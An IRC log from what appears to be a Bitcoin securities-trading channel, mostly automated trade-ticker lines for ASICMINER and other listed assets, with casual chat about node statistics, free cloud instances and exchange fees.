23:08:03 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [-] Jun 05 23:09:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] Jun 05 23:09:10 [BTCTC] [TAT.ASICMINER] 136 @ 0.025 = 3.4 BTC [+] Jun 05 23:09:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 05 23:09:13 [HAVELOCK] [ASICM] 7 @ 0.02480001 = 0.1736 BTC [-] Jun 05 23:09:47 [HAVELOCK] [ASICM] 10 @ 0.02475 = 0.2475 BTC [-] Jun 05 23:11:26 [BTCTC] [TAT.ASICMINER] 119 @ 0.025 = 2.975 BTC [+] Jun 05 23:11:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 05 23:11:48 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [+] Jun 05 23:12:30 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [+] Jun 05 23:12:34 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [+] Jun 05 23:12:41 [BTCTC] [ASICMINER-PT] 5 @ 2.52 = 12.6 BTC [+] Jun 05 23:12:45 [BTCTC] [ASICMINER-PT] 2 @ 2.527 = 5.054 BTC [+] Jun 05 23:12:47 [BTCTC] [ASICMINER-PT] 1 @ 2.5289 BTC [+] Jun 05 23:13:08 [BTCTC] [GSDPT] 1 @ 0.0029 BTC [-] Jun 05 23:13:26 [BTCTC] [GSDPT] 5 @ 0.002899 = 0.0145 BTC [-] Jun 05 23:13:31 [BTCTC] [GSDPT] 10 @ 0.0028 = 0.028 BTC [-] Jun 05 23:13:32 [BTCTC] [GSDPT] 3 @ 0.002711 = 0.0081 BTC [-] Jun 05 23:13:51 [HAVELOCK] [ASICM] 10 @ 0.0249 = 0.249 BTC [+] Jun 05 23:14:45 https://bitcointalk.org/index.php?topic=67591.msg2372158#msg2372158 Jun 05 23:14:57 are those bots really as profitable as it seems? Jun 05 23:15:28 [BTCTC] [S.DICE-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 05 23:15:35 [BTCTC] [S.DICE-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 05 23:15:41 [BTCTC] [S.DICE-PT] 300 @ 0.00246 = 0.738 BTC [-] Jun 05 23:16:54 I never used such a mainstream one because the fact that it is mainstream cant make the bot really valuable Jun 05 23:17:03 [BTCTC] [TAT.ASICMINER] 15 @ 0.024999 = 0.375 BTC [-] Jun 05 23:21:03 [HAVELOCK] [ASICM] 14 @ 0.0249 = 0.3486 BTC [+] Jun 05 23:21:59 [BTCTC] [BITVPS] 3 @ 0.000647 = 0.0019 BTC [+] Jun 05 23:22:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.024602 = 0.0492 BTC [-] Jun 05 23:22:39 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [-] Jun 05 23:22:54 [BTCTC] [BITVPS] 1 @ 0.00059 BTC [-] Jun 05 23:24:13 [HAVELOCK] [ASICM] 3 @ 0.0249 = 0.0747 BTC [+] Jun 05 23:25:15 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [-] Jun 05 23:25:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.024997 = 0.05 BTC [+] Jun 05 23:30:01 [BTCTC] [TAT.ASICMINER] 16 @ 0.024998 = 0.4 BTC [+] Jun 05 23:30:20 [HAVELOCK] [ASICM] 3 @ 0.0249 = 0.0747 BTC [+] Jun 05 23:30:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.024998 = 0.125 BTC [+] Jun 05 23:31:47 [BTCTC] [TAT.ASICMINER] 35 @ 0.024999 = 0.875 BTC [+] Jun 05 23:33:58 [HAVELOCK] [ASICM] 2 @ 0.0249 = 0.0498 BTC [+] Jun 05 23:34:27 [HAVELOCK] [ASICM] 56 @ 0.0249 = 1.3944 BTC [+] Jun 05 23:34:50 [HAVELOCK] [SDICE] 1 @ 0.2344 BTC [-] Jun 05 23:35:10 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 05 23:39:19 [BTCTC] [ASICMINER-PT] 2 @ 2.528 = 5.056 BTC [+] Jun 05 23:41:57 [BTCTC] [GSDPT] 3 @ 0.00319 = 0.0096 BTC [+] Jun 05 23:42:40 [BTCTC] [GSDPT] 1 @ 0.003191 BTC [+] Jun 05 23:44:50 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [+] Jun 05 23:46:32 [HAVELOCK] [ASICM] 3 @ 0.0249 = 0.0747 BTC [+] Jun 05 23:47:55 [BTCTC] [TAT.ASICMINER] 31 @ 0.025 = 0.775 BTC [+] Jun 05 23:49:43 [BTCTC] [TAT.ASICMINER] 40 @ 0.025 = 1 BTC [+] Jun 05 23:50:34 [HAVELOCK] [ASICM] 1 @ 0.02485 BTC [-] Jun 05 23:51:08 [HAVELOCK] [ASICM] 60 @ 0.0249 = 1.494 BTC [+] Jun 05 23:52:01 [HAVELOCK] [ASICM] 1 @ 0.02524999 BTC [+] Jun 05 23:57:38 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 05 23:59:52 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [+] Jun 05 23:59:57 [HAVELOCK] [ASICM] 140 @ 0.0249 = 3.486 BTC [-] Jun 05 23:59:58 [HAVELOCK] [ASICM] 71 @ 0.02485001 = 1.7644 BTC [-] Jun 06 00:00:00 [HAVELOCK] [ASICM] 13 @ 0.02485 = 0.3231 BTC [-] Jun 06 00:07:43 [BTCTC] [ASICMINER-PT] 2 @ 2.525 = 5.05 BTC [-] Jun 06 00:09:44 [BTCTC] [ASICMINER-PT] 2 @ 2.526 = 5.052 BTC [+] Jun 06 00:10:34 [BTCTC] [ASICMINER-PT] 4 @ 2.5279 = 10.1116 BTC [+] Jun 06 00:10:57 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [+] Jun 06 00:10:59 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] Jun 06 00:12:58 [HAVELOCK] [VTX] 1 @ 0.425 BTC [-] Jun 06 00:18:25 [HAVELOCK] [ASICM] 22 @ 0.025 = 0.55 BTC [+] Jun 06 00:19:17 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [+] Jun 06 00:20:14 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [+] Jun 06 00:21:43 aany news today? Jun 06 00:24:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [+] Jun 06 00:25:45 [HAVELOCK] [ASICM] 12 @ 0.025 = 0.3 BTC [+] Jun 06 00:27:17 [BTCTC] [TAT.ASICMINER] 39 @ 0.025 = 0.975 BTC [+] Jun 06 00:27:36 deadweasel: freenode under siege again, bots offline Jun 06 00:28:14 except for assbot obv. she'll fall last. Jun 06 00:28:16 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] Jun 06 00:28:22 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] Jun 06 00:29:17 -otc ground to halt :D Jun 06 00:31:55 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Jun 06 00:32:21 hm Jun 06 00:33:16 good times. Jun 06 00:33:42 arent there like 10 copies of gribble online Jun 06 00:34:32 I went to -otc to see , I feel dirty now and need a shower Jun 06 00:34:43 that place is a shithole of stupid people Jun 06 00:34:54 you are slovenly now, gtfo Jun 06 00:35:43 I feel like I got a STD from there, I am itching now Jun 06 00:35:43 where would one find the number of active bitcoin nodes over time? Jun 06 00:35:54 there was a chart. Jun 06 00:35:54 don't scratch it, you got scabies. Jun 06 00:36:11 [HAVELOCK] [ASICM] 30 @ 0.025198 = 0.7559 BTC [+] Jun 06 00:36:14 and it was falling exponentianly Jun 06 00:36:32 exactly why I want a copy Jun 06 00:36:43 i'll go search some more, at least i know it exists! Jun 06 00:36:54 ;;ticker Jun 06 00:36:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.025 = 0.5 BTC [+] Jun 06 00:37:20 [HAVELOCK] [ASICM] 4 @ 0.025198 = 0.1008 BTC [+] Jun 06 00:37:39 ew scabies Jun 06 00:37:59 get that cream asap Jun 06 00:38:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 00:38:41 [BTCTC] [PAJKA.BOND] 1 @ 0.106001 BTC [-] Jun 06 00:39:17 [MPEX] [S.MPOE] 11064 @ 0.00074213 = 8.2109 BTC [+] Jun 06 00:39:34 http://blockchain.info/nodes-globe Jun 06 00:39:35 [HAVELOCK] [ASICM] 6 @ 0.025198 = 0.1512 BTC [+] Jun 06 00:39:36 that's pretty cool Jun 06 00:39:36 [HAVELOCK] [ASICM] 60 @ 0.025199 = 1.5119 BTC [+] Jun 06 00:39:37 [HAVELOCK] [ASICM] 29 @ 0.0252 = 0.7308 BTC [+] Jun 06 00:41:18 [BTCTC] [BTC-TRADING-PT] 1 @ 0.3 BTC [+] Jun 06 00:41:37 [HAVELOCK] [ASICM] 22 @ 0.02519999 = 0.5544 BTC [-] Jun 06 00:42:12 [HAVELOCK] [ASICM] 4 @ 0.02519999 = 0.1008 BTC [-] Jun 06 00:43:27 [BTCTC] [GSDPT] 4 @ 0.0032 = 0.0128 BTC [+] Jun 06 00:44:23 https://bitnodes.io/ <--- I want to sell free amazon EC2 instances for BTC! Jun 06 00:45:52 [HAVELOCK] [ASICM] 9 @ 0.02519999 = 0.2268 BTC [-] Jun 06 00:45:53 http://getaddr.bitnodes.io/ Does this nodes graph look accurate? Jun 06 00:46:01 chart, pardon Jun 06 00:47:06 [HAVELOCK] [ASICM] 4 @ 0.0252 = 0.1008 BTC [+] Jun 06 00:47:07 [BTCTC] [PAJKA.BOND] 2 @ 0.104 = 0.208 BTC [-] Jun 06 00:48:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [+] Jun 06 00:49:02 haha, free ec2 instances. simpleshell.com will fuck them big time, if/when i go around to do it Jun 06 00:49:24 [HAVELOCK] [ASICM] 66 @ 0.0252 = 1.6632 BTC [+] Jun 06 00:49:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02503 BTC [+] Jun 06 00:50:18 i tried one of those for four days and they sent me a bill for $60 bucks..when I complained they apologized saying their metrics were bugged and that I'd get a refund..it never came. Jun 06 00:50:26 I'd be glad to help fuck them back. Jun 06 00:52:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.02503 = 0.3004 BTC [+] Jun 06 00:53:51 they did the same to me, i got a refund though. have to be careful what you use -- it all looks the same but you have to pay for some. Jun 06 00:56:16 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [+] Jun 06 01:00:49 basically you have only one t1.micro with some minimal storage for free Jun 06 01:00:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 06 01:01:22 all other services have only few free hours to trial Jun 06 01:02:45 [BTCTC] [ASICMINER-PT] 1 @ 2.5273 BTC [+] Jun 06 01:02:47 [BTCTC] [ASICMINER-PT] 1 @ 2.5274 BTC [+] Jun 06 01:02:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5275 BTC [+] Jun 06 01:02:49 [BTCTC] [ASICMINER-PT] 1 @ 2.5277 BTC [+] Jun 06 01:03:22 lol bitnodes.io doesn't offer EBS at all.. so no persistent storage for ya. Jun 06 01:03:52 [HAVELOCK] [ASICM] 3 @ 0.02523 = 0.0757 BTC [+] Jun 06 01:03:57 [HAVELOCK] [ASICM] 2 @ 0.02523 = 0.0505 BTC [+] Jun 06 01:05:23 free instances are all I need. Jun 06 01:06:23 [HAVELOCK] [ASICM] 21 @ 0.02523 = 0.5298 BTC [+] Jun 06 01:06:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5279 BTC [+] Jun 06 01:06:59 Opened ports: ...8333. cuz bitcoind is best ran on ephemeral store. Jun 06 01:07:06 [HAVELOCK] [ASICM] 31 @ 0.02523 = 0.7821 BTC [+] Jun 06 01:07:19 and without backups Jun 06 01:10:42 i have not open those on my ec2 instance.... Jun 06 01:10:57 i store no coins there, I jsut want a node of my own to pet. Jun 06 01:11:58 [MPEX] [S.MPOE] 9650 @ 0.00074213 = 7.1616 BTC [+] Jun 06 01:12:00 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [+] Jun 06 01:12:03 [BTCTC] [ASICMINER-PT] 2 @ 2.528 = 5.056 BTC [+] Jun 06 01:13:39 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] Jun 06 01:13:41 [HAVELOCK] [ASICM] 5 @ 0.02523999 = 0.1262 BTC [+] Jun 06 01:14:31 [BTCTC] [TAT.ASICMINER] 16 @ 0.0248 = 0.3968 BTC [-] Jun 06 01:14:54 [BTCTC] [ASICMINER-PT] 1 @ 2.5288 BTC [+] Jun 06 01:16:00 [HAVELOCK] [ASICM] 19 @ 0.02523999 = 0.4796 BTC [+] Jun 06 01:16:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.0248 = 0.248 BTC [-] Jun 06 01:16:25 [BTCTC] [TAT.ASICMINER] 77 @ 0.025 = 1.925 BTC [+] Jun 06 01:18:54 [HAVELOCK] [ASICM] 15 @ 0.0252 = 0.378 BTC [-] Jun 06 01:19:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5201 BTC [-] Jun 06 01:19:30 [BTCTC] [ASICMINER-PT] 7 @ 2.52 = 17.64 BTC [-] Jun 06 01:19:48 [BTCTC] [ASICMINER-PT] 2 @ 2.528 = 5.056 BTC [+] Jun 06 01:21:54 [HAVELOCK] [ASICM] 1 @ 0.02523999 BTC [+] Jun 06 01:21:56 [HAVELOCK] [ASICM] 10 @ 0.02523999 = 0.2524 BTC [+] Jun 06 01:22:04 [BTCTC] [ASICMINER-PT] 1 @ 2.5289 BTC [+] Jun 06 01:24:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.025 = 0.625 BTC [+] Jun 06 01:25:43 [HAVELOCK] [ASICM] 24 @ 0.02523999 = 0.6058 BTC [+] Jun 06 01:26:19 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] Jun 06 01:26:25 [HAVELOCK] [ASICM] 3 @ 0.02523999 = 0.0757 BTC [+] Jun 06 01:26:41 [BTCTC] [S.DICE-PT] 1125 @ 0.002574 = 2.8958 BTC [+] Jun 06 01:26:49 here are free vpses to pet, too: http://www.host1free.com/free-vps/ Jun 06 01:27:48 [HAVELOCK] [ASICM] 3 @ 0.02523999 = 0.0757 BTC [+] Jun 06 01:28:07 [HAVELOCK] [ASICM] 30 @ 0.02523999 = 0.7572 BTC [+] Jun 06 01:28:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [-] Jun 06 01:28:17 [BTCTC] [TAT.ASICMINER] 43 @ 0.025 = 1.075 BTC [+] Jun 06 01:28:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.025 = 0.45 BTC [+] Jun 06 01:29:58 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 06 01:30:45 [MPEX] [S.MPOE] 11458 @ 0.00074146 = 8.4956 BTC [-] Jun 06 01:30:47 [MPEX] [S.MPOE] 3760 @ 0.000741 = 2.7862 BTC [-] Jun 06 01:33:44 [HAVELOCK] [ASICM] 59 @ 0.02523999 = 1.4892 BTC [+] Jun 06 01:34:11 [BTCTC] [TAT.ASICMINER] 9 @ 0.025 = 0.225 BTC [+] Jun 06 01:34:17 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [+] Jun 06 01:34:19 [BTCTC] [ASICMINER-PT] 19 @ 2.529 = 48.051 BTC [+] Jun 06 01:34:23 [BTCTC] [ASICMINER-PT] 8 @ 2.53 = 20.24 BTC [+] Jun 06 01:35:48 [BTCTC] [BTC-BOND] 4 @ 0.00999 = 0.04 BTC [-] Jun 06 01:36:15 [BTCTC] [ASICMINER-PT] 71 @ 2.52 = 178.92 BTC [-] Jun 06 01:37:10 [BTCTC] [S.DICE-PT] 12 @ 0.002733 = 0.0328 BTC [+] Jun 06 01:37:12 [BTCTC] [S.DICE-PT] 10 @ 0.002736 = 0.0274 BTC [+] Jun 06 01:37:13 [BTCTC] [S.DICE-PT] 10 @ 0.002773 = 0.0277 BTC [+] Jun 06 01:37:15 [BTCTC] [S.DICE-PT] 25 @ 0.0028 = 0.07 BTC [+] Jun 06 01:37:21 [BTCTC] [S.DICE-PT] 11 @ 0.002899 = 0.0319 BTC [+] Jun 06 01:37:22 [BTCTC] [S.DICE-PT] 20 @ 0.00293 = 0.0586 BTC [+] Jun 06 01:37:24 [BTCTC] [S.DICE-PT] 49 @ 0.002937 = 0.1439 BTC [+] Jun 06 01:37:25 [BTCTC] [S.DICE-PT] 13 @ 0.002968 = 0.0386 BTC [+] Jun 06 01:37:25 [BTCTC] [S.DICE-PT] 43 @ 0.00298 = 0.1281 BTC [+] Jun 06 01:37:33 [BTCTC] [S.DICE-PT] 6807 @ 0.00299 = 20.3529 BTC [+] Jun 06 01:37:49 [BTCTC] [BTC-BOND] 5 @ 0.00992 = 0.0496 BTC [-] Jun 06 01:39:40 ok listen to this Jun 06 01:39:42 "Yes, that might be called stealing. Do I care about it enough to whine endlessly on forums? No." Jun 06 01:39:47 [BTCTC] [BTC-BOND] 5 @ 0.009902 = 0.0495 BTC [-] Jun 06 01:39:56 he is allowing ppl to sleal from him Jun 06 01:40:01 doesnt mind Jun 06 01:45:09 [BTCTC] [BTC-BOND] 10 @ 0.0099 = 0.099 BTC [-] Jun 06 01:45:28 [MPEX] [S.MPOE] 9360 @ 0.00074213 = 6.9463 BTC [+] Jun 06 01:45:29 [MPEX] [S.MPOE] 1940 @ 0.00074215 = 1.4398 BTC [+] Jun 06 01:45:50 [BTCTC] [BTC-BOND] 4 @ 0.0099 = 0.0396 BTC [-] Jun 06 01:45:52 [BTCTC] [BTC-BOND] 5 @ 0.0099 = 0.0495 BTC [-] Jun 06 01:46:02 [BTCTC] [BTC-GOLD] 2 @ 0.005305 = 0.0106 BTC [-] Jun 06 01:46:36 [BTCTC] [BTC-BOND] 5 @ 0.00981 = 0.0491 BTC [-] Jun 06 01:46:44 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] Jun 06 01:47:24 [BTCTC] [BTC-BOND] 2 @ 0.0098 = 0.0196 BTC [-] Jun 06 01:47:28 [BTCTC] [BTC-BOND] 5 @ 0.0098 = 0.049 BTC [-] Jun 06 01:47:58 [BTCTC] [BTC-BOND] 1 @ 0.00979 BTC [-] Jun 06 01:48:52 [BTCTC] [BTC-BOND] 19 @ 0.00977 = 0.1856 BTC [-] Jun 06 01:49:08 [HAVELOCK] [ASICM] 1 @ 0.02523999 BTC [+] Jun 06 01:49:41 [HAVELOCK] [ASICM] 1 @ 0.02523999 BTC [+] Jun 06 01:50:33 [BTCTC] [BTC-BOND] 1 @ 0.00977 BTC [-] Jun 06 01:50:36 [BTCTC] [BTC-BOND] 50 @ 0.00977 = 0.4885 BTC [-] Jun 06 01:51:19 [BTCTC] [BTC-BOND] 15 @ 0.00977 = 0.1466 BTC [-] Jun 06 01:54:30 [HAVELOCK] [ASICM] 4 @ 0.02523999 = 0.101 BTC [+] Jun 06 01:54:46 [BTCTC] [TAT.ASICMINER] 40 @ 0.025 = 1 BTC [+] Jun 06 01:56:01 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] Jun 06 01:57:33 [HAVELOCK] [VTX] 1 @ 0.4242 BTC [-] Jun 06 02:02:23 [BTCTC] [BASIC-MINING] 6 @ 0.7 = 4.2 BTC [+] Jun 06 02:04:24 [BTCTC] [TAT.ASICMINER] 174 @ 0.02472 = 4.3013 BTC [-] Jun 06 02:06:46 [HAVELOCK] [ASICM] 64 @ 0.02523999 = 1.6154 BTC [+] Jun 06 02:11:26 [BTCTC] [ASICMINER-PT] 4 @ 2.51 = 10.04 BTC [-] Jun 06 02:14:24 [HAVELOCK] [ASICM] 21 @ 0.02523999 = 0.53 BTC [+] Jun 06 02:15:56 kakobrekla who ? Jun 06 02:21:20 [HAVELOCK] [ASICM] 3 @ 0.0252 = 0.0756 BTC [-] Jun 06 02:26:10 [BTCTC] [ASICMINER-PT] 1 @ 2.476202 BTC [-] Jun 06 02:26:12 [BTCTC] [ASICMINER-PT] 5 @ 2.476201 = 12.381 BTC [-] Jun 06 02:26:14 [BTCTC] [ASICMINER-PT] 6 @ 2.4762 = 14.8572 BTC [-] Jun 06 02:26:18 [BTCTC] [ASICMINER-PT] 4 @ 2.4761 = 9.9044 BTC [-] Jun 06 02:26:20 [BTCTC] [ASICMINER-PT] 9 @ 2.476 = 22.284 BTC [-] Jun 06 02:28:22 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [-] Jun 06 02:28:23 [HAVELOCK] [ASICM] 3 @ 0.02501 = 0.075 BTC [-] Jun 06 02:28:25 [HAVELOCK] [ASICM] 40 @ 0.02501 = 1.0004 BTC [-] Jun 06 02:28:25 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [-] Jun 06 02:28:26 [HAVELOCK] [ASICM] 91 @ 0.025 = 2.275 BTC [-] Jun 06 02:30:04 [HAVELOCK] [ASICM] 7 @ 0.0252 = 0.1764 BTC [+] Jun 06 02:30:09 kakobrekla: are you a 2001 space odeyssey fan? Jun 06 02:30:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 02:30:40 if someone is already taking 0.5% from me, and i can't do anything about it, i wouldn't spend much effort complaining that the actual number is 0.505% instead of 0.5% Jun 06 02:30:43 [HAVELOCK] [ASICM] 8 @ 0.0252 = 0.2016 BTC [+] Jun 06 02:31:26 at least if we are only talking about thousands of dollars Jun 06 02:33:03 [HAVELOCK] [ASICM] 9 @ 0.025 = 0.225 BTC [-] Jun 06 02:33:04 [HAVELOCK] [ASICM] 14 @ 0.0249 = 0.3486 BTC [-] Jun 06 02:33:06 [HAVELOCK] [ASICM] 43 @ 0.0248 = 1.0664 BTC [-] Jun 06 02:33:40 [HAVELOCK] [ASICM] 2 @ 0.0247 = 0.0494 BTC [-] Jun 06 02:34:49 mircea_popescu: "Revenue from misrouted deposits : 200 BTC" Is this the first time shareholders have gotten paid for people fucking up deposits? Haha wow. Jun 06 02:35:50 bitbet did it a few times sort-of Jun 06 02:36:17 [BTCTC] [BITVPS] 1 @ 0.0006 BTC [+] Jun 06 02:38:25 [HAVELOCK] [ASICM] 1 @ 0.025215 BTC [+] Jun 06 02:42:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 06 02:47:41 mircea_popescu who what Jun 06 02:47:46 i dunno. Jun 06 02:48:18 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] Jun 06 02:48:40 thestringpuller, well.. mostly clarke fan and secondly i like kubrick and the odyssey is brilliant Jun 06 02:48:58 From what I gather the thinking here is that nobody is ever convinced by more text. People go by the names involved, and possibly, sometimes, maybe, by a fifty word blurb. If that's not good enough then it's just not good enough; the asking for more text is basically an invitation to roleplay "Internet Businessmen, the MMO" on whatever forum. I don't think MP has any patience for that. Jun 06 02:49:10 dude... i feel so represented. Jun 06 02:49:23 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 06 02:49:56 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] Jun 06 02:51:11 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 06 02:51:38 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [+] Jun 06 02:51:59 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Jun 06 02:52:03 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [-] Jun 06 02:52:27 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] Jun 06 02:53:13 [MPEX] [S.MG] 370 @ 0.00010055 = 0.0372 BTC Jun 06 02:53:14 [MPEX] [S.MG] 572135 @ 0.00010002 = 57.2249 BTC [-] Jun 06 02:53:16 [MPEX] [S.MG] 100000 @ 0.00010001 = 10.001 BTC [-] Jun 06 02:53:18 [MPEX] [S.MG] 1000000 @ 0.0001 = 100 BTC [-] Jun 06 02:53:23 [MPEX] [S.MG] 350000 @ 0.0001 = 35 BTC [-] Jun 06 02:53:25 [MPEX] [S.MG] 9050 @ 0.0001 = 0.905 BTC [-] Jun 06 02:53:26 [MPEX] [S.MG] 2800000 @ 0.0001 = 280 BTC [-] Jun 06 02:53:27 [MPEX] [S.MG] 500000 @ 0.0001 = 50 BTC [-] Jun 06 02:53:41 [MPEX] [S.MG] 4000000 @ 0.0001 = 400 BTC [-] Jun 06 02:53:43 [MPEX] [S.MG] 4000000 @ 0.0001 = 400 BTC [-] Jun 06 02:54:29 !ticker m s.mg Jun 06 02:54:31 [MPEX:S.MG] 1D: 0.0001 / 0.0001 / 0.00010055 (13331555 shares, 1,333.17 BTC), 7D: 0.0001 / 0.0001 / 0.00010055 (13331555 shares, 1,333.17 BTC), 30D: 0.0001 / 0.0001 / 0.00010055 (13331555 shares, 1,333.17 BTC) Jun 06 02:54:39 cool. so it's a go for sure. Jun 06 02:59:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [+] Jun 06 03:04:48 [BTCTC] [PAJKA.BOND] 1 @ 0.106 BTC [+] Jun 06 03:05:53 [BTCTC] [ASICMINER-PT] 1 @ 2.509999 BTC [+] Jun 06 03:06:19 [BTCTC] [ASICMINER-PT] 5 @ 2.51 = 12.55 BTC [+] Jun 06 03:06:26 [BTCTC] [PAJKA.BOND] 2 @ 0.107 = 0.214 BTC [+] Jun 06 03:06:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 03:08:43 [BTCTC] [GSDPT] 3 @ 0.0031 = 0.0093 BTC [-] Jun 06 03:13:59 [BTCTC] [BASIC-MINING] 1 @ 0.685101 BTC [-] Jun 06 03:14:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.024999 = 0.2 BTC [-] Jun 06 03:16:04 [HAVELOCK] [ASICM] 14 @ 0.0252 = 0.3528 BTC [-] Jun 06 03:17:16 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [+] Jun 06 03:17:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.024999 = 0.125 BTC [-] Jun 06 03:19:45 [HAVELOCK] [ASICM] 4 @ 0.0252 = 0.1008 BTC [-] Jun 06 03:21:22 [BTCTC] [MININGCO.ETF] 11 @ 0.7676 = 8.4436 BTC [+] Jun 06 03:21:26 [BTCTC] [MININGCO.ETF] 6 @ 0.77 = 4.62 BTC [+] Jun 06 03:21:47 [HAVELOCK] [ASICM] 1 @ 0.02521 BTC [+] Jun 06 03:22:54 [HAVELOCK] [ASICM] 4 @ 0.02521 = 0.1008 BTC [+] Jun 06 03:24:42 [HAVELOCK] [ASICM] 21 @ 0.0252 = 0.5292 BTC [-] Jun 06 03:27:16 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Jun 06 03:27:30 [HAVELOCK] [ASICM] 16 @ 0.0252 = 0.4032 BTC [-] Jun 06 03:27:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.024999 = 0.2 BTC [-] Jun 06 03:28:35 [BTCTC] [TAT.ASICMINER] 43 @ 0.025 = 1.075 BTC [+] Jun 06 03:29:35 [BTCTC] [PAJKA.BOND] 1 @ 0.099101 BTC [-] Jun 06 03:30:18 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 06 03:30:25 [BTCTC] [PAJKA.BOND] 1 @ 0.0991 BTC [-] Jun 06 03:30:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 03:30:59 [BTCTC] [PAJKA.BOND] 9 @ 0.0991 = 0.8919 BTC [-] Jun 06 03:31:35 [BTCTC] [PAJKA.BOND] 25 @ 0.099 = 2.475 BTC [-] Jun 06 03:34:55 [BTCTC] [TAT.ASICMINER] 17 @ 0.02476 = 0.4209 BTC [-] Jun 06 03:35:05 [BTCTC] [TAT.ASICMINER] 50 @ 0.02475 = 1.2375 BTC [-] Jun 06 03:35:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02474 = 0.2474 BTC [-] Jun 06 03:35:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02473 BTC [-] Jun 06 03:35:19 [BTCTC] [TAT.ASICMINER] 22 @ 0.02472 = 0.5438 BTC [-] Jun 06 03:35:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.02471 = 0.6178 BTC [-] Jun 06 03:35:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Jun 06 03:35:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0247 = 0.0494 BTC [-] Jun 06 03:35:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.02465 = 0.0493 BTC [-] Jun 06 03:35:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0246 = 0.0492 BTC [-] Jun 06 03:35:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.024552 = 0.2455 BTC [-] Jun 06 03:40:35 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] Jun 06 03:40:37 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Jun 06 03:43:16 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 06 03:43:36 [BTCTC] [S.DICE-PT] 48 @ 0.00291 = 0.1397 BTC [-] Jun 06 03:44:36 [BTCTC] [S.DICE-PT] 300 @ 0.00293 = 0.879 BTC [+] Jun 06 03:47:13 [BTCTC] 